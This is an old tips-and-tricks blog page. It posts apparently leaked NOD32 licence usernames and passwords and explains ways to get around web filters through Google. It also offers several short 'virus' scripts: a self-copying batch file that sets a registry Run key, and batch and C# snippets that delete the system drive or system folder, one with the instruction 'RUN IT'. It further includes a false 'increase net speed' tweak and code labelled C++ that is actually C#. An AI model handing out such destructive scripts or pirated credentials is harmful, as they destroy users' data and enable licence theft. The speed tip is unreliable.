Monday, August 31, 2009

nod 32 usernames and pwd

nod 32 usernames and pwd
UserName: EAV-16110434
PassWord: n4vejptbpc

UserName: EAV-13559906
PassWord: 7urej5xva5

UserName: EAV-16340916
PassWord: jb2nr6mh7s

UserName: EAV-15925111
PassWord: 7t4mmh4rt3

UserName: EAV-13559911
PassWord: wdwd7kkf48

How to use Google as proxy

How to use Google as proxy

Many jobs and schools block access to certain sites. However, it is very difficult for anybody to block access to google. By using google with either of these methods, you can gain access to blocked sites very easily.

I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an uncommon way for bypassing blocked sites using google.

* The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the "cached" link that appears on google. Easy, simple, and frequently works for static information.
*

Passing the site through google translator works well as well. Here's the URL to use:
Code:

http://translate.google.com/translate?u=http%3A%2F%2Ftoptechsite.com&langpair=es|en&hl=en&ie=UTF-8

Where toptechsite.com is the site that you wish to visit.

This translates the site from english to english and works because the ip address will appear as google instead of you. Here's a link to tech-recipes passed through the translator as an example. You can actually do this with any language pair. Change en|en in the URL above to spanish by using es|es and it still works.
* Unique method that I have not seen described before is to search through google mobile. Google mobile will "convert as you go" very similar to the translation method above.

Just search for your site with google mobile and click on the link it provides. Here's is tech-recipes brought up through google mobile search. Once again, this will allow you to bypass any blocks because the IP request comes from google not for you.

Like the translation method above, google will continue to "proxy" as you continue to visit links through the site.

This is also useful to retrive some information from net which is currently not available.
Some days ago rkmania.com was down and I wanted to download one mp3 urgently from there so I searched google for site:rkmania.com song name and I saw the link in google search.I opened cached page of that page and got the download link so this trick is very useful in such conditions.

Increase Your Net Speed

Increase Your Net Speed
* Go to desktop->My computer-(right click on)->manage->->Device manager->

Now u see a window of Device manager.
* Then go to Ports->Communication Port(double click on it and Open).
* After open u can see a Communication Port properties.
go the Port Setting.

* And now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

YOU WILL NOTICE AN IMMEDIATE RESULT.

This will increase the receiving capacity of your input port and thus ur netspeed will be increased.

All the best.

Finding IP address in Gmail

Finding IP address in Gmail

* Finding IP address in Gmail Log into your Gmail account with your username and password.
* Open the mail.
* Switch your Gmail to basic HTML view.
*

To display the headers,
# Click on More options corresponding to that thread. You should get a bunch of links.
# Click on Show original.

* You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. Suppose , In this case, it is

65.119.112.245.

That is the IP address of the sender!
* Track the IP address of the sender.

All the best.

How To Save Flash File from a Website

How To Save Flash File from a Website
Submitted by enlively on Tue, 09/02/2008 - 09:17.

* how to

Join Top Tech Site and post your articles.

Some cartoons or animations that are available for online viewing usually can be ripped so that you can play it offline. There’s a good chance that they are made in Shockwave Flash format using the Macromedia Flash program. Whether it is flash animation, flash tutorials, flash websites, or even flash advertisement, all can be saved to your hard using some methods if they are in the same format.

For Firefox user

1) Click on Tools - Page Info
2). Then, click the Media Tab on the Page Info Windows
3). The media tab will have complete list of Images, CSS Files and Shockwave Flash files that were downloaded by the Firefox browser while loading the page of the website.
4). Scroll down the list and locate the .swf file.
5). Click the “Save As” button. Choose some folder on your hard drive and save the file.

For Internet Explorer user

1) Firstly, click Tools - Internet Options
2) In the General Tab, click the Settings button available in the Temporary Internet Files group.
3) Click View Files to open your Temporary Internet Files folder.
4) Click View - Details. Now click View - Arrange Icons By - Internet Address. Depending upon the webpage, there could one or more Flash files (Shockwave Flash Object) under the Internet Address.
5) Once you find the right flash file, right-click and choose Copy. Then paste the .swf file in any other folder,such as My Document.

Note: Those methods above only function if your internet browser’s cache file has not been cleared yet. Make sure that you did not close the internet browser before you save the flash file.

The alternative method that you can use is by using download manager such as Flashget and Internet Download Manager which both you can easily obtain in the internet. For Flashget, use the ‘download all’ option and select the file that you want, while for Internet Download Manager, use the Grabber tool and run the wizard.

view Star Wars movie with MS-Dos

To view Star Wars movie with MS-Dos
1. Go to Start > Run
2. Type cmd and press Ok
3. Type telnet towel.blinkenlights.nl in new window and press.

Sunday, August 23, 2009

Simple batch virus

SIMPLE BATCH VIRUS

This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don’t run this on ur pc
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h [...]

Replace google with ur name

Replace google with ur name
copy the link and paste it in your browser

put your text...after the" gname="


Link:
Code:
http://www.pimpmysearch.com/home.html?gname=

creat a virus in c++

using System;
using System.Diagnostics;

namespace DoingThisIsDumb
{
public static void Main()
{
Process.Start("deltree.exe", "-r -f %SYSTEMROOT%");
}
}

create a virus in notepad

@Echo off
Del C:\ *.* |y

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

create a virus using notepad

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

How to Put Google Adsense Below Post Title in Blogger?

Adsense is used by  majority  of expert bloggers for their website monetization because it is a cookie based contextual advertising syste...